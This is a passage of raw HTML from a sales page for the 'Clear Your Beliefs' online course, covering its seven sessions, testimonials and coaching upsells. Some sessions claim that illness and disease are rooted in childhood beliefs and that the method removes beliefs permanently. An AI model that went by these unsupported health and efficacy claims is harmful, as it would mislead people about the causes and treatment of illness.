effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each 